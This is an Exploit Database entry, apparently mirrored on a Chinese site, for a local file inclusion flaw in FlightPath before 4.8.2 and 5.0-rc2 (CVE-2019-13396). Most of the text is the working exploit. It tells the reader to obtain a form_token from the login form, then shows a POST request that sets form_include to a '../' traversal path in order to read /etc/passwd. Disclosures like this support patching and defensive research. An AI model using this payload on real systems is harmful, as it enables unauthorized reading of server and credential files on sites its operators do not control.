FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion

• Exploit Database
• 19 阅读

• 作者： Mohammed Althibyani
  日期： 2019-07-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47121/

• # Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
  # Date: 07-07-2019
  # Exploit Author: Mohammed Althibyani
  # Vendor Homepage: http://getflightpath.com
  # Software Link: http://getflightpath.com/project/9/releases
  # Version: < 4.8.2 & < 5.0-rc2
  # Tested on: Kali Linux
  # CVE : CVE-2019-13396
  
  
  # Parameters : include_form
  # POST Method:
  
  use the login form to get right form_token [ you can use wrong user/pass ]
  
  This is how to POST looks like:
  
  POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
  
  callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login
  
  
  # modfiy the POST request to be:
  
  
  POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
  
  callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
  
  
  
  
  # Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.